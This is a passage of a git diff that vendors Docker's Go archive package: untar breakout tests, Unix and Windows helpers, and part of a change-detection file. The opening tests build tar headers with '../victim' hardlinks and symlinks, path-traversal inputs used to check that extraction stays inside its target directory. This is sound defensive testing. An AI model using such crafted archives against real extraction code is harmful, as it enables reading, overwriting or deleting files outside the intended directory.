+		if err := testBreakout("untar", "docker-TestUntarHardlinkToSymlink", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestUntarInvalidHardlink(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	if runtime.GOOS == "windows" {
+		t.Skip("hardlinks on Windows")
+	}
+	for i, headers := range [][]*tar.Header{
+		{ // try reading victim/hello (../)
+			{
+				Name:     "dotdot",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (/../)
+			{
+				Name:     "slash-dotdot",
+				Typeflag: tar.TypeLink,
+				// Note the leading slash
+				Linkname: "/../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try writing victim/file
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim/file",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (hardlink, symlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "symlink",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // Try reading victim/hello (hardlink, hardlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "hardlink",
+				Typeflag: tar.TypeLink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // Try removing victim directory (hardlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
+		if err := testBreakout("untar", "docker-TestUntarInvalidHardlink", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestUntarInvalidSymlink(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	if runtime.GOOS == "windows" {
+		t.Skip("hardlinks on Windows")
+	}
+	for i, headers := range [][]*tar.Header{
+		{ // try reading victim/hello (../)
+			{
+				Name:     "dotdot",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (/../)
+			{
+				Name:     "slash-dotdot",
+				Typeflag: tar.TypeSymlink,
+				// Note the leading slash
+				Linkname: "/../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try writing victim/file
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim/file",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (symlink, symlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "symlink",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (symlink, hardlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "hardlink",
+				Typeflag: tar.TypeLink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try removing victim directory (symlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{ // try writing to victim/newdir/newfile with a symlink in the path
+			{
+				// this header needs to be before the next one, or else there is an error
+				Name:     "dir/loophole",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "dir/loophole/newdir/newfile",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
+		if err := testBreakout("untar", "docker-TestUntarInvalidSymlink", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestTempArchiveCloseMultipleTimes(t *testing.T) {
+	reader := ioutil.NopCloser(strings.NewReader("hello"))
+	tempArchive, err := NewTempArchive(reader, "")
+	buf := make([]byte, 10)
+	n, err := tempArchive.Read(buf)
+	if n != 5 {
+		t.Fatalf("Expected to read 5 bytes. Read %d instead", n)
+	}
+	for i := 0; i < 3; i++ {
+		if err = tempArchive.Close(); err != nil {
+			t.Fatalf("i=%d. Unexpected error closing temp archive: %v", i, err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go
new file mode 100644
index 0000000000..7083f2fa53
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go
@@ -0,0 +1,118 @@
+// +build !windows
+
+package archive
+
+import (
+	"archive/tar"
+	"errors"
+	"os"
+	"path/filepath"
+	"syscall"
+
+	"github.com/docker/docker/pkg/system"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+)
+
+// fixVolumePathPrefix does platform specific processing to ensure that if
+// the path being passed in is not in a volume path format, convert it to one.
+func fixVolumePathPrefix(srcPath string) string {
+	return srcPath
+}
+
+// getWalkRoot calculates the root path when performing a TarWithOptions.
+// We use a separate function as this is platform specific. On Linux, we
+// can't use filepath.Join(srcPath,include) because this will clean away
+// a trailing "." or "/" which may be important.
+func getWalkRoot(srcPath string, include string) string {
+	return srcPath + string(filepath.Separator) + include
+}
+
+// CanonicalTarNameForPath returns platform-specific filepath
+// to canonical posix-style path for tar archival. p is relative
+// path.
+func CanonicalTarNameForPath(p string) (string, error) {
+	return p, nil // already unix-style
+}
+
+// chmodTarEntry is used to adjust the file permissions used in tar header based
+// on the platform the archival is done.
+
+func chmodTarEntry(perm os.FileMode) os.FileMode {
+	return perm // noop for unix as golang APIs provide perm bits correctly
+}
+
+func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) {
+	s, ok := stat.(*syscall.Stat_t)
+
+	if !ok {
+		err = errors.New("cannot convert stat value to syscall.Stat_t")
+		return
+	}
+
+	inode = uint64(s.Ino)
+
+	// Currently go does not fill in the major/minors
+	if s.Mode&syscall.S_IFBLK != 0 ||
+		s.Mode&syscall.S_IFCHR != 0 {
+		hdr.Devmajor = int64(major(uint64(s.Rdev)))
+		hdr.Devminor = int64(minor(uint64(s.Rdev)))
+	}
+
+	return
+}
+
+func getFileUIDGID(stat interface{}) (int, int, error) {
+	s, ok := stat.(*syscall.Stat_t)
+
+	if !ok {
+		return -1, -1, errors.New("cannot convert stat value to syscall.Stat_t")
+	}
+	return int(s.Uid), int(s.Gid), nil
+}
+
+func major(device uint64) uint64 {
+	return (device >> 8) & 0xfff
+}
+
+func minor(device uint64) uint64 {
+	return (device & 0xff) | ((device >> 12) & 0xfff00)
+}
+
+// handleTarTypeBlockCharFifo is an OS-specific helper function used by
+// createTarFile to handle the following types of header: Block; Char; Fifo
+func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error {
+	if rsystem.RunningInUserNS() {
+		// cannot create a device if running in user namespace
+		return nil
+	}
+
+	mode := uint32(hdr.Mode & 07777)
+	switch hdr.Typeflag {
+	case tar.TypeBlock:
+		mode |= syscall.S_IFBLK
+	case tar.TypeChar:
+		mode |= syscall.S_IFCHR
+	case tar.TypeFifo:
+		mode |= syscall.S_IFIFO
+	}
+
+	if err := system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))); err != nil {
+		return err
+	}
+	return nil
+}
+
+func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error {
+	if hdr.Typeflag == tar.TypeLink {
+		if fi, err := os.Lstat(hdr.Linkname); err == nil && (fi.Mode()&os.ModeSymlink == 0) {
+			if err := os.Chmod(path, hdrInfo.Mode()); err != nil {
+				return err
+			}
+		}
+	} else if hdr.Typeflag != tar.TypeSymlink {
+		if err := os.Chmod(path, hdrInfo.Mode()); err != nil {
+			return err
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go
new file mode 100644
index 0000000000..4eeafdd128
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go
@@ -0,0 +1,249 @@
+// +build !windows
+
+package archive
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"syscall"
+	"testing"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+func TestCanonicalTarNameForPath(t *testing.T) {
+	cases := []struct{ in, expected string }{
+		{"foo", "foo"},
+		{"foo/bar", "foo/bar"},
+		{"foo/dir/", "foo/dir/"},
+	}
+	for _, v := range cases {
+		if out, err := CanonicalTarNameForPath(v.in); err != nil {
+			t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err)
+		} else if out != v.expected {
+			t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out)
+		}
+	}
+}
+
+func TestCanonicalTarName(t *testing.T) {
+	cases := []struct {
+		in       string
+		isDir    bool
+		expected string
+	}{
+		{"foo", false, "foo"},
+		{"foo", true, "foo/"},
+		{"foo/bar", false, "foo/bar"},
+		{"foo/bar", true, "foo/bar/"},
+	}
+	for _, v := range cases {
+		if out, err := canonicalTarName(v.in, v.isDir); err != nil {
+			t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err)
+		} else if out != v.expected {
+			t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out)
+		}
+	}
+}
+
+func TestChmodTarEntry(t *testing.T) {
+	cases := []struct {
+		in, expected os.FileMode
+	}{
+		{0000, 0000},
+		{0777, 0777},
+		{0644, 0644},
+		{0755, 0755},
+		{0444, 0444},
+	}
+	for _, v := range cases {
+		if out := chmodTarEntry(v.in); out != v.expected {
+			t.Fatalf("wrong chmod. expected:%v got:%v", v.expected, out)
+		}
+	}
+}
+
+func TestTarWithHardLink(t *testing.T) {
+	origin, err := ioutil.TempDir("", "docker-test-tar-hardlink")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")); err != nil {
+		t.Fatal(err)
+	}
+
+	var i1, i2 uint64
+	if i1, err = getNlink(filepath.Join(origin, "1")); err != nil {
+		t.Fatal(err)
+	}
+	// sanity check that we can hardlink
+	if i1 != 2 {
+		t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1)
+	}
+
+	dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dest)
+
+	// we'll do this in two steps to separate failure
+	fh, err := Tar(origin, Uncompressed)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// ensure we can read the whole thing with no error, before writing back out
+	buf, err := ioutil.ReadAll(fh)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	bRdr := bytes.NewReader(buf)
+	err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if i1, err = getInode(filepath.Join(dest, "1")); err != nil {
+		t.Fatal(err)
+	}
+	if i2, err = getInode(filepath.Join(dest, "2")); err != nil {
+		t.Fatal(err)
+	}
+
+	if i1 != i2 {
+		t.Errorf("expected matching inodes, but got %d and %d", i1, i2)
+	}
+}
+
+func getNlink(path string) (uint64, error) {
+	stat, err := os.Stat(path)
+	if err != nil {
+		return 0, err
+	}
+	statT, ok := stat.Sys().(*syscall.Stat_t)
+	if !ok {
+		return 0, fmt.Errorf("expected type *syscall.Stat_t, got %t", stat.Sys())
+	}
+	// We need this conversion on ARM64
+	return uint64(statT.Nlink), nil
+}
+
+func getInode(path string) (uint64, error) {
+	stat, err := os.Stat(path)
+	if err != nil {
+		return 0, err
+	}
+	statT, ok := stat.Sys().(*syscall.Stat_t)
+	if !ok {
+		return 0, fmt.Errorf("expected type *syscall.Stat_t, got %t", stat.Sys())
+	}
+	return statT.Ino, nil
+}
+
+func TestTarWithBlockCharFifo(t *testing.T) {
+	origin, err := ioutil.TempDir("", "docker-test-tar-hardlink")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := system.Mknod(filepath.Join(origin, "2"), syscall.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))); err != nil {
+		t.Fatal(err)
+	}
+	if err := system.Mknod(filepath.Join(origin, "3"), syscall.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))); err != nil {
+		t.Fatal(err)
+	}
+	if err := system.Mknod(filepath.Join(origin, "4"), syscall.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))); err != nil {
+		t.Fatal(err)
+	}
+
+	dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dest)
+
+	// we'll do this in two steps to separate failure
+	fh, err := Tar(origin, Uncompressed)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// ensure we can read the whole thing with no error, before writing back out
+	buf, err := ioutil.ReadAll(fh)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	bRdr := bytes.NewReader(buf)
+	err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err := ChangesDirs(origin, dest)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(changes) > 0 {
+		t.Fatalf("Tar with special device (block, char, fifo) should keep them (recreate them when untar) : %v", changes)
+	}
+}
+
+// TestTarUntarWithXattr is Unix as Lsetxattr is not supported on Windows
+func TestTarUntarWithXattr(t *testing.T) {
+	if runtime.GOOS == "solaris" {
+		t.Skip()
+	}
+	origin, err := ioutil.TempDir("", "docker-test-untar-origin")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0); err != nil {
+		t.Fatal(err)
+	}
+
+	for _, c := range []Compression{
+		Uncompressed,
+		Gzip,
+	} {
+		changes, err := tarUntar(t, origin, &TarOptions{
+			Compression:     c,
+			ExcludePatterns: []string{"3"},
+		})
+
+		if err != nil {
+			t.Fatalf("Error tar/untar for compression %s: %s", c.Extension(), err)
+		}
+
+		if len(changes) != 1 || changes[0].Path != "/3" {
+			t.Fatalf("Unexpected differences after tarUntar: %v", changes)
+		}
+		capability, _ := system.Lgetxattr(filepath.Join(origin, "2"), "security.capability")
+		if capability == nil && capability[0] != 0x00 {
+			t.Fatalf("Untar should have kept the 'security.capability' xattr.")
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go
new file mode 100644
index 0000000000..5c3a1be340
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go
@@ -0,0 +1,70 @@
+// +build windows
+
+package archive
+
+import (
+	"archive/tar"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/longpath"
+)
+
+// fixVolumePathPrefix does platform specific processing to ensure that if
+// the path being passed in is not in a volume path format, convert it to one.
+func fixVolumePathPrefix(srcPath string) string {
+	return longpath.AddPrefix(srcPath)
+}
+
+// getWalkRoot calculates the root path when performing a TarWithOptions.
+// We use a separate function as this is platform specific.
+func getWalkRoot(srcPath string, include string) string {
+	return filepath.Join(srcPath, include)
+}
+
+// CanonicalTarNameForPath returns platform-specific filepath
+// to canonical posix-style path for tar archival. p is relative
+// path.
+func CanonicalTarNameForPath(p string) (string, error) {
+	// windows: convert windows style relative path with backslashes
+	// into forward slashes. Since windows does not allow '/' or '\'
+	// in file names, it is mostly safe to replace however we must
+	// check just in case
+	if strings.Contains(p, "/") {
+		return "", fmt.Errorf("Windows path contains forward slash: %s", p)
+	}
+	return strings.Replace(p, string(os.PathSeparator), "/", -1), nil
+
+}
+
+// chmodTarEntry is used to adjust the file permissions used in tar header based
+// on the platform the archival is done.
+func chmodTarEntry(perm os.FileMode) os.FileMode {
+	perm &= 0755
+	// Add the x bit: make everything +x from windows
+	perm |= 0111
+
+	return perm
+}
+
+func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) {
+	// do nothing. no notion of Rdev, Inode, Nlink in stat on Windows
+	return
+}
+
+// handleTarTypeBlockCharFifo is an OS-specific helper function used by
+// createTarFile to handle the following types of header: Block; Char; Fifo
+func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error {
+	return nil
+}
+
+func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error {
+	return nil
+}
+
+func getFileUIDGID(stat interface{}) (int, int, error) {
+	// no notion of file ownership mapping yet on Windows
+	return 0, 0, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go
new file mode 100644
index 0000000000..0c6733d6bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go
@@ -0,0 +1,91 @@
+// +build windows
+
+package archive
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestCopyFileWithInvalidDest(t *testing.T) {
+	// TODO Windows: This is currently failing. Not sure what has
+	// recently changed in CopyWithTar as used to pass. Further investigation
+	// is required.
+	t.Skip("Currently fails")
+	folder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(folder)
+	dest := "c:dest"
+	srcFolder := filepath.Join(folder, "src")
+	src := filepath.Join(folder, "src", "src")
+	err = os.MkdirAll(srcFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ioutil.WriteFile(src, []byte("content"), 0777)
+	err = CopyWithTar(src, dest)
+	if err == nil {
+		t.Fatalf("archiver.CopyWithTar should throw an error on invalid dest.")
+	}
+}
+
+func TestCanonicalTarNameForPath(t *testing.T) {
+	cases := []struct {
+		in, expected string
+		shouldFail   bool
+	}{
+		{"foo", "foo", false},
+		{"foo/bar", "___", true}, // unix-styled windows path must fail
+		{`foo\bar`, "foo/bar", false},
+	}
+	for _, v := range cases {
+		if out, err := CanonicalTarNameForPath(v.in); err != nil && !v.shouldFail {
+			t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err)
+		} else if v.shouldFail && err == nil {
+			t.Fatalf("canonical path call should have failed with error. in=%s out=%s", v.in, out)
+		} else if !v.shouldFail && out != v.expected {
+			t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out)
+		}
+	}
+}
+
+func TestCanonicalTarName(t *testing.T) {
+	cases := []struct {
+		in       string
+		isDir    bool
+		expected string
+	}{
+		{"foo", false, "foo"},
+		{"foo", true, "foo/"},
+		{`foo\bar`, false, "foo/bar"},
+		{`foo\bar`, true, "foo/bar/"},
+	}
+	for _, v := range cases {
+		if out, err := canonicalTarName(v.in, v.isDir); err != nil {
+			t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err)
+		} else if out != v.expected {
+			t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out)
+		}
+	}
+}
+
+func TestChmodTarEntry(t *testing.T) {
+	cases := []struct {
+		in, expected os.FileMode
+	}{
+		{0000, 0111},
+		{0777, 0755},
+		{0644, 0755},
+		{0755, 0755},
+		{0444, 0555},
+	}
+	for _, v := range cases {
+		if out := chmodTarEntry(v.in); out != v.expected {
+			t.Fatalf("wrong chmod. expected:%v got:%v", v.expected, out)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes.go b/vendor/github.com/docker/docker/pkg/archive/changes.go
new file mode 100644
index 0000000000..c07d55cbd9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes.go
@@ -0,0 +1,446 @@
+package archive
+
+import (
+	"archive/tar"
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/system"
+)
+
+// ChangeType represents the change type.
+type ChangeType int
+
+const (
+	// ChangeModify represents the modify operation.
+	ChangeModify = iota
+	// ChangeAdd represents the add operation.
+	ChangeAdd
+	// ChangeDelete represents the delete operation.
+	ChangeDelete
+)
+
+func (c ChangeType) String() string {
+	switch c {
+	case ChangeModify:
+		return "C"
+	case ChangeAdd:
+		return "A"
+	case ChangeDelete:
+		return "D"
+	}
+	return ""
+}
+
+// Change represents a change, it wraps the change type and path.
+// It describes changes of the files in the path respect to the
+// parent layers. The change could be modify, add, delete.
+// This is used for layer diff.
+type Change struct {
+	Path string
+	Kind ChangeType
+}
+
+func (change *Change) String() string {
+	return fmt.Sprintf("%s %s", change.Kind, change.Path)
+}
+
+// for sort.Sort
+type changesByPath []Change
+
+func (c changesByPath) Less(i, j int) bool { return c[i].Path < c[j].Path }
+func (c changesByPath) Len() int           { return len(c) }
+func (c changesByPath) Swap(i, j int)      { c[j], c[i] = c[i], c[j] }
+
+// Gnu tar and the go tar writer don't have sub-second mtime
+// precision, which is problematic when we apply changes via tar
+// files, we handle this by comparing for exact times, *or* same
+// second count and either a or b having exactly 0 nanoseconds
+func sameFsTime(a, b time.Time) bool {
+	return a == b ||
+		(a.Unix() == b.Unix() &&
+			(a.Nanosecond() == 0 || b.Nanosecond() == 0))
+}
+
+func sameFsTimeSpec(a, b syscall.Timespec) bool {
+	return a.Sec == b.Sec &&
+		(a.Nsec == b.Nsec || a.Nsec == 0 || b.Nsec == 0)
+}
+
+// Changes walks the path rw and determines changes for the files in the path,
+// with respect to the parent layers
+func Changes(layers []string, rw string) ([]Change, error) {
+	return changes(layers, rw, aufsDeletedFile, aufsMetadataSkip)
+}
+
+func aufsMetadataSkip(path string) (skip bool, err error) {
+	skip, err = filepath.Match(string(os.PathSeparator)+WhiteoutMetaPrefix+"*", path)
+	if err != nil {
+		skip = true
+	}
+	return
+}
+
+func aufsDeletedFile(root, path string, fi os.FileInfo) (string, error) {
+	f := filepath.Base(path)
+
+	// If there is a whiteout, then the file was removed
+	if strings.HasPrefix(f, WhiteoutPrefix) {
+		originalFile := f[len(WhiteoutPrefix):]
+		return filepath.Join(filepath.Dir(path), originalFile), nil
+	}
+
+	return "", nil
+}
+
+type skipChange func(string) (bool, error)
+type deleteChange func(string, string, os.FileInfo) (string, error)
+
+func changes(layers []string, rw string, dc deleteChange, sc skipChange) ([]Change, error) {
+	var (
+		changes     []Change
+		changedDirs = make(map[string]struct{})
+	)
+
+	err := filepath.Walk(rw, func(path string, f os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+
+		// Rebase path
+		path, err = filepath.Rel(rw, path)
+		if err != nil {
+			return err
+		}
+
+		// As this runs on the daemon side, file paths are OS specific.
+		path = filepath.Join(string(os.PathSeparator), path)
+
+		// Skip root
+		if path == string(os.PathSeparator) {
+			return nil
+		}
+
+		if sc != nil {
+			if skip, err := sc(path); skip {
+				return err
+			}
+		}
+
+		change := Change{
+			Path: path,
+		}
+
+		deletedFile, err := dc(rw, path, f)
+		if err != nil {
+			return err
+		}
+
+		// Find out what kind of modification happened
+		if deletedFile != "" {
+			change.Path = deletedFile
+			change.Kind = ChangeDelete
+		} else {
+			// Otherwise, the file was added
+			change.Kind = ChangeAdd
+
+			// ...Unless it already existed in a top layer, in which case, it's a modification
+			for _, layer := range layers {
+				stat, err := os.Stat(filepath.Join(layer, path))
+				if err != nil && !os.IsNotExist(err) {
+					return err
+				}
+				if err == nil {
+					// The file existed in the top layer, so that's a modification
+
+					// However, if it's a directory, maybe it wasn't actually modified.
+					// If you modify /foo/bar/baz, then /foo will be part of the changed files only because it's the parent of bar
+					if stat.IsDir() && f.IsDir() {
+						if f.Size() == stat.Size() && f.Mode() == stat.Mode() && sameFsTime(f.ModTime(), stat.ModTime()) {
+							// Both directories are the same, don't record the change
+							return nil
+						}
+					}
+					change.Kind = ChangeModify
+					break
+				}
+			}
+		}
+
+		// If /foo/bar/file.txt is modified, then /foo/bar must be part of the changed files.
+		// This block is here to ensure the change is recorded even if the
+		// modify time, mode and size of the parent directory in the rw and ro layers are all equal.
+		// Check https://github.com/docker/docker/pull/13590 for details.
+		if f.IsDir() {
+			changedDirs[path] = struct{}{}
+		}
+		if change.Kind == ChangeAdd || change.Kind == ChangeDelete {
+			parent := filepath.Dir(path)
+			if _, ok := changedDirs[parent]; !ok && parent != "/" {
+				changes = append(changes, Change{Path: parent, Kind: ChangeModify})
+				changedDirs[parent] = struct{}{}
+			}
+		}
+
+		// Record change
+		changes = append(changes, change)
+		return nil
+	})
+	if err != nil && !os.IsNotExist(err) {
+		return nil, err
+	}
+	return changes, nil
+}
+
+// FileInfo describes the information of a file.
+type FileInfo struct {
+	parent     *FileInfo
+	name       string
+	stat       *system.StatT
+	children   map[string]*FileInfo
+	capability []byte
+	added      bool
+}
+
+// LookUp looks up the file information of a file.
+func (info *FileInfo) LookUp(path string) *FileInfo {
+	// As this runs on the daemon side, file paths are OS specific.
+	parent := info
+	if path == string(os.PathSeparator) {
+		return info
+	}
+
+	pathElements := strings.Split(path, string(os.PathSeparator))
+	for _, elem := range pathElements {
+		if elem != "" {
+			child := parent.children[elem]
+			if child == nil {
+				return nil
+			}
+			parent = child
+		}
+	}
+	return parent
+}
+
+func (info *FileInfo) path() string {
+	if info.parent == nil {
+		// As this runs on the daemon side, file paths are OS specific.
+		return string(os.PathSeparator)
+	}
+	return filepath.Join(info.parent.path(), info.name)
+}
+
+func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) {
+
+	sizeAtEntry := len(*changes)
+
+	if oldInfo == nil {
+		// add
+		change := Change{
+			Path: info.path(),
+			Kind: ChangeAdd,
+		}
+		*changes = append(*changes, change)
+		info.added = true
+	}
+
+	// We make a copy so we can modify it to detect additions
+	// also, we only recurse on the old dir if the new info is a directory
+	// otherwise any previous delete/change is considered recursive
+	oldChildren := make(map[string]*FileInfo)
+	if oldInfo != nil && info.isDir() {
+		for k, v := range oldInfo.children {
+			oldChildren[k] = v
+		}
+	}
+
+	for name, newChild := range info.children {
+		oldChild, _ := oldChildren[name]
+		if oldChild != nil {
+			// change?
+			oldStat := oldChild.stat
+			newStat := newChild.stat
+			// Note: We can't compare inode or ctime or blocksize here, because these change
+			// when copying a file into a container. However, that is not generally a problem
+			// because any content change will change mtime, and any status change should
+			// be visible when actually comparing the stat fields. The only time this
+			// breaks down is if some code intentionally hides a change by setting
+			// back mtime
+			if statDifferent(oldStat, newStat) ||
+				bytes.Compare(oldChild.capability, newChild.capability) != 0 {
+				change := Change{
+					Path: newChild.path(),
+					Kind: ChangeModify,
+				}
+				*changes = append(*changes, change)
+				newChild.added = true
+			}
+
+			// Remove from copy so we can detect deletions
+			delete(oldChildren, name)
+		}
+
+		newChild.addChanges(oldChild, changes)
+	}
+	for _, oldChild := range oldChildren {
+		// delete
+		change := Change{
+			Path: oldChild.path(),
+			Kind: ChangeDelete,
+		}
+		*changes = append(*changes, change)
+	}
+
+	// If there were changes inside this directory, we need to add it, even if the directory
+	// itself wasn't changed. This is needed to properly save and restore filesystem permissions.
+	// As this runs on the daemon side, file paths are OS specific.
+	if len(*changes) > sizeAtEntry && info.isDir() && !info.added && info.path() != string(os.PathSeparator) {
+		change := Change{
+			Path: info.path(),
+			Kind: ChangeModify,
+		}
+		// Let's insert the directory entry before the recently added entries located inside this dir
+		*changes = append(*changes, change) // just to resize the slice, will be overwritten
+		copy((*changes)[sizeAtEntry+1:], (*changes)[sizeAtEntry:])
+		(*changes)[sizeAtEntry] = change
+	}
+
+}
+
+// Changes add changes to file information.
+func (info *FileInfo) Changes(oldInfo *FileInfo) []Change {
+	var changes []Change
+
+	info.addChanges(oldInfo, &changes)
+
+	return changes
+}
+
+func newRootFileInfo() *FileInfo {
+	// As this runs on the daemon side, file paths are OS specific.
+	root := &FileInfo{
+		name:     string(os.PathSeparator),
+		children: make(map[string]*FileInfo),
+	}
+	return root
+}
+
+// ChangesDirs compares two directories and generates an array of Change objects describing the changes.
+// If oldDir is "", then all files in newDir will be Add-Changes.
+func ChangesDirs(newDir, oldDir string) ([]Change, error) {
+	var (
+		oldRoot, newRoot *FileInfo
+	)
+	if oldDir == "" {
+		emptyDir, err := ioutil.TempDir("", "empty")
+		if err != nil {
+			return nil, err
+		}
+		defer os.Remove(emptyDir)
